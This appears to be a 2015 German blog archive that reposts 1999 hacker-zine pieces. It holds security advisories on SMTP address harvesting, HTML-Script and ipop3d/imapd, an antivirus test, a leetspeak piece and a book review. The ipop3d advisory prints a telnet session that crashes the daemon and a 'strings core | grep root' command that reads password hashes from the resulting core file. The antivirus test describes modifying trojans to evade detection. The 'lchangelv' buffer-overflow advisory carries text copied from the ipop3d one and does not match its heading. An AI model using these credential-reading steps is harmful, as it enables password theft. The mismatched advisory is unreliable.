Monat: Oktober 2015

(c)1999 Vision Crew Stuttgart

Neuer Angriffstyp ermittelt gültige E-mail-Adressen

Betriebssystem

alle Systeme
Software

Mailserver
Angriffe

Ermittlung gültiger E-mail-Adressen
Schutz

–
Stichworte

Spionage, brute-force-Angriff, Wörterbuch
Datum

16.03.1999

Das SMTP-Protokoll sieht vor, daß die Empfängeradresse mittels des Befehls RCPT TO:<Name> dem Server übermittelt wird. Ist der Empfänger unbekannt, wird eine Fehlermeldung zurückgegeben .

Problem
Ein neuer Typ von Spionageprogrammen – genannt „address collector“ – geht auf die Suche nach E-mail-Adressen. Mittels eines Wörterbuchs mit häufig genutzten Namen werden systematisch Adressen gesucht und abgespeichert. Beispiel:
02:24 16:22 SMTPD(00360110) [209.86.182.86] MAIL
FROM:<info@savings.com>
02:24 16:22 SMTPD(00360110) [209.86.182.86] RCPT
TO:<arne@954access.net>
02:24 16:22 SMTPD(00360110) [209.86.182.86] RCPT
TO:<arnie@954access.net>
02:24 16:22 SMTPD(00360110) [209.86.182.86] ERR 954access.net invalid
user <arnie@954access.net
Wird keine Fehlermeldung erzeugt, geht das Angriffsprogramm von der Existenz der Adresse aus.

Empfehlung
Zur Zeit gibt es keinen wirksamen Schutz gegen diesen Angriff, mit dem der Mailserver für Stunden beschäftigt werden kann. Ist die (natürlich) gespoofte Absenderadresse bekannt (info@savings.com in unserem Beispiel), können diese Adressen für die weitere Kommunikation ausgeschlossen werden. Besser wäre es, wenn der Mailserver nach mehreren Fehlermeldungen die Verbindung abbricht. Die Programmierer von Mailservern sollten dieses Feature in ihre nächsten Versionen einbauen.

Information
http://www.netspace.org/cgi-bin/wa?A1=ind9903a&L=bugtraq#13
http://www.l8r.com/nwa/nwa1.htm

(c) 1999 Vision Crew Stuttgart

Betriebssystem

Unix
Software

Unix Webserver mit installiertem HTML-Script Version 2.99x und kleiner
Angriffe

Lesen von Dateien
Stichworte

fremde Berechtigungen, cgi-Skripte, Webserver
Datum

20.02.1999

Die kommerzielle Software HTML-Script ist ein Tool zur vereinfachten Zugriffesverwaltung vom Internet auf die eigenen www-Seiten.

Problem
Durch einen Fehler im Parser für die cgi-Scripte können auf allen Rechnern mit installiertem HTML-Script beliebige Dateien gelesen werden.

Empfehlung
Ein Workaround ist nicht verfügbar. Als Patch kann das Upgrade auf HTML-Script 2.9932 oder 3.x/Miva 1.x: durchgeführt werden

Information
http://www.htmlscript.com

Vision Crew Aktuell
(c) 1999 by SkyHawkeVC
Dieser Test wurde am 29.05.1999 von 10-12 Uhr durchgeführt

Maillist-Nr.: 3

*** Vision Crew Stuttgart deckt großen Schwindel auf ! ***

Knapp 300 Mark kostet das neue Antivirus Programm AVP mit Datum vom 15.05.1999 von Kaspersky. Wir waren doch gleich begeistert und haben uns tatsächlich dazu entschlossen gleich zwei Exemplare davon zu kaufen, schließlich wurde in der Werbung auch angegeben das jeder Trojaner erkannt und entfernt wird und welcher Hacker hat schon gerne einen Trojaner auf seinen eigenen Rechner außer die Client Version 😉

Nun sind wir doch mal gespannt, schließlich hängt unsere Zukunft von dem nicht Funktionieren der Software ab, also ab zum testen. Wir haben dafür drei gleich Konfigurierte Systeme mit Windofff 98 benutzt und diese mit Absicht infiziert. Dabei sind die drei bekanntesten Trojaner benutzt worden, zum einen Bo und Netbus aber auch der schon bekannte Girlfrend.

Kaum waren die Rechner Verseucht, schlug auch schon AVP Alarm und meldete Trojaner an. Mit tränen in den Augen und schon Gedanken vielleicht doch ein anderes Hobby zu suchen, haben wir auf allen Rechnern das Desinfektions Button angeklickt. Doch das was nun kam hinterließ ein lächeln im Gesicht, den mit Desinfektion oder löschen der Infizierten Datei war dann doch nichts, im Gegenteil an einem Rechner ist sogar der AVP ganz abgestürzt und brachte gar keine Meldungen mehr.

Na was war das den ? Insgesamt 600 DM für Software ausgegeben uns die stürzt ab ? Nun ja es gibt ja den Support für Leute die so einen Schwachsinn auch noch kaufen. Leider gehören wir mittlerweile auch dazu ;-(

Was soll man sagen, hat jemals etwas beim Support Funktioniert ? Neeee und bei AVP schon garnicht.

Wir haben die Rechner nach dieser Niederlage und 600 DM weniger in der Tasche dann doch Manuell von den Trojanern befreien müssen. Jedoch waren wir immer noch darüber beunruhigt das jeder Nutzer von AVP über den Trojaner Informiert wird, mit ein paar Kenntnissen sind diese ja leicht zu entfernen. Also das ganze noch einmal, diesmal haben wir aber jeden Trojaner Modifiziert und den Dateinamen geändert. Wie erwartet hat AVP den NetBus und Gilfrend nicht erkannt, jedoch bei Bo schlug er wieder Alarm. So eine Schande aber auch, war doch BO der Liebling der Vision Crew. Nun was uns nicht gleich aufgefallen ist, das AVP den BO client als Trojaner entlarvte ??????? Nun ja das mag ja wohl sein, das BOClient und BoServer aus dem gleichen Stall sind aber BOClient ein Trojaner, nun gut der BoClient wurde von uns entfernt und das System nochmals Gestartet und wolla keine Meldungen mehr über einen Trojaner und das auf allen drei Systemen.

Tja zum Schluß können wir da nur sagen: AVP ist sein Geld nicht wert und wer dennoch nicht darauf verzichten möchte, sollte den Gang ins Internet lieber meiden., schnell ist ein Trojaner dein bester Freund und du merkst es nicht mal weil dein AVP absolute scheiße ist.

Hallo ihr Hacker!

Ich möchte nun ein wenig über Elite Sprache oder auch 31337 Speech berichten! Aller Anfang ist schwer und so hatte ich am Anfang Probleme, überhaupt rauszukriegen, was die ganzen Hacker mit 31337 meinen. (Ich stellte mir was überaus kompliziertes vor!)

Also, unter 31337-speech versteht man nichts anderes, als Buchstaben durch ähnlich andere Zeichen, meist Ziffern, zu ersetzen. Beispielsweise der Satz:

Hallo allezusammen, ich hoffe das Magazin wird toll!

würde wie folgt aussehen:

h4110 4113zu54mm3n, 1ch h0ff3 d45 m4g4z1n w1rd t011!

Aber unter dem Begriff 31337 versteht man noch anderes. Wen man sich zu den 31337 Hackern zäht, dann ist man in jeder Hinsicht des Hacken’s auch ELITE! Also man kann am besten alles!

Viele Docs sagen nun, wenn man sich nun unbedingt in Einschlägigen IRC-Channels (Chaträumen) aufhalten will, sollte man ausschließlich seine Kommentare in Form von 31337 speech abgeben. Es kursieren viele interessante Ideen, Buchstaben durch andere Zeichen zu ersetzen, z.B.: ein „K“ symbolisieren viele mit „|<“ wobei das ganze jetzt in Times New Roman ziehmlich scheisse aussieht. Im Text-basierten Chat sieht das dann besser aus.

Also, meine Frage:
Was haltet ihr von dieser „31337 speech“? Schreibt ein Posting ins Forum!

Tschüss,
stevoberg

Informationsquelle: Vision Crew Stuttgart
(c) 1999 by MerLinVC

Pufferüberlauf in lchangelv
Betriebssystem Unix/ AIX 4.1, 4.2
Software /usr/sbin/lchangelv
Angriffe Start von Programmen mit root-Berechtigung
Stichworte Pufferüberlauf, root-Berechtigung
Datum 15.09.1998

Das Programm lchangelv ist Bestandteil des Logical Volume Managers und dient der Modifikation eines Logical Volumes. Das Programm läuft mit gesetztem setuid-Bit und wird inNormalfall vom smit aus gestartet. (mac)

Problem
Bei einem Anmeldeversuch mit unbekanntem User über Telnet direkt an den beiden Ports stürzen die Programme mit einem Coredump ab. In der Datei /core, die für Jedermann lesbar ist, stehen diverse Paßwörter verschlüsselt oder im lartext.;)] Jeder User mit lokalem Account kann Paßwörter direkt auslesen bzw. in den Besitz von Shadow-Paßwörtern gelangen und diese ggf. mit einem Paßwortcracker entschlüsseln.

——————————————————————————–

Empfehlung
Als Workaround sollten die beiden Dämonen deaktiviert werden. Patches sind nicht verfügbar.

——————————————————————————–

Information
Folgendes Beispiel demonstriert den Bug

[root@koek] /# telnet zopie 110
Trying 10.10.13.1…
Connected to zopie.attic.vuurwerk.nl.
Escape character is ‚^]‘.
+OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.
At this point ipop3d coredumps in /core:

[root@zopie] /# strings core | grep -A3 root
root

[crypted pw here]
10244

Sun Feb 1 23:45:15 1998

Informationsquelle: Vision Crew Stuttgart
(c) 1999 by MerLinVC
Herausgefunden durch: Test für Kunde (Nr-19828)

Sicherheitsprobleme bei imapd und ipop3d
Betriebssystem Unix / Linux Slackware 3.4 mit installiertem pine-Paket
Software /usr/sbin/imapd bzw. /usr/sbin/ipop3d
Angriffe Auslesen von Paßwörtern
Stichworte Pufferüberlauf, Paßwörter
Datum 01.02.1999

Die beiden Dämonen imapd und ipop3d nehmen Anfragen von Clients entgegen
und versorgen diese mit den angekommenen E-mails im POP3- bzw. IMAP-Standard.
Dazu warten dieProgramme an den Ports 143 (imapd) und 110 (pop3d). (mac)

Problem
Bei einem Anmeldeversuch mit unbekanntem User über Telnet direkt an den beiden Ports stürzen die Programme mit einem Coredump ab. In der Datei /core, die für Jedermannlesbar ist, stehen diverse Paßwörter verschlüsselt oder im Klartext.;)] Jeder User mit lokalem Account kann Paßwörter direkt auslesen bzw. in den Besitz von Shadow-Paßwörtern gelangen und diese ggf. mit einem Paßwortcracker entschlüsseln.

Empfehlung
Als Workaround sollten die beiden Dämonen deaktiviert werden. Patches sind nicht verfügbar.

Information
Folgendes Beispiel demonstriert den Bug. [root@koek] /# telnet zopie 110

Trying 10.10.13.1…
Connected to zopie.attic.vuurwerk.nl.
Escape character is ‚^]‘.
+OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU)
at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.

At this point ipop3d coredumps in /core:

[root@zopie] /# strings core | grep -A3 root
root

[crypted pw here]

10244

Sun Feb 1 23:45:15 1998

Nicht’s ahnend begab ich mich auch diesen Abend wieder in die unendlichen Weiten der globalen Vernetzung, des unglaublichen Angebots an Informationen. Es dauerte nicht lange, bis ich über ein wahrhaft interessant aussehendes Banner stolperte … „Hacker’s Black Book“.

Was ? Schon wieder irgendwelche Exploits ? Nein … diesmal war es sogar ein richtiges Buch mit hartem Umschlag. Nun … dies konnte man jedenfalls vom Bild her entnehmen. Die Anzeige war natürlich gigantisch … „Die besten Hacker der Szene berichten … der legendäre Report ist fertig …“ Von diesem Satz angezogen, um doch mal einfach reinzuschauen, laß ich mir die weiteren Sachen durch … „Zugang zu unzählig vielen Hacker-Programmen … blablabla.“ Nur warme Luft, wie sich später rausstellte. Aber da meine Neugier meinen Verstand bezwang, bestellte ich es mal einfach so *lol* … der größte Fehler, den ich seit *grübel* 2 Jahren begangen habe. Nun … nach 3 Tagen war es dann angekommen … und ich wunderte mich, denn … Sollte es nicht ein Buch sein ? Ja, eigentlich schon … aber das einzigste was in den mageren Umschlag steckte, war ein dünnes, schlecht gestaltetes, mit ekelhafter roter Farbe übermaltes HEFTCHEN mit … stolzen 20 Seiten „richtigen“ Inhalt. Wow … ich weigere mich die anderen 7 Seiten noch dazu zu zählen, da dies nur Geschwalle ist, und nicht mal gelungen !

Nun … geschockt von diesem … Ding … schüttelte ich meinen Kopf, und öffnete es vorsichtig.

Nachdem ich alles schnell überflogen habe merke ich es … oh mein Gott … WAS WAR DENN DAS FÜR EIN BLÖDSINN ? Ich lese mir ein paar Artikel genauer durch, wobei ich bemerken muss, daß sie sehr schlecht geschrieben sind, und stelle mit Bedauern fest :

Ca. 70 % dieses Heftchens beschäftigt sich mit Passwörtern von Pay-Sites ! Ein wirklich anödendes Thema … und wenn sich der Autor ( falls es einen gibt, und dieses Heft nicht einfach aus Artikeln zusammengestellt worden ist ! ) solch eine Vorstellung unter einem „Hacker“ macht, dann ist dies sehr bedauerlich. Ich meine … ich wollte dieses HEFT objektiv bewerten, was ich auch tat : Es ist GRAUENHAFT ! Einfach nur UNNÖTIG ! Und so mögt gewarnt sein, denn 38 DM nur für ein albernes Heft auszugeben ist wahrhaft unnötig, das mußte ich leider feststellen.

Das Hacker’s Black Book ist der reinste Müll ! ( Jaja, meine Objektivität *g* )

In diesem Sinne …

SilverSurfer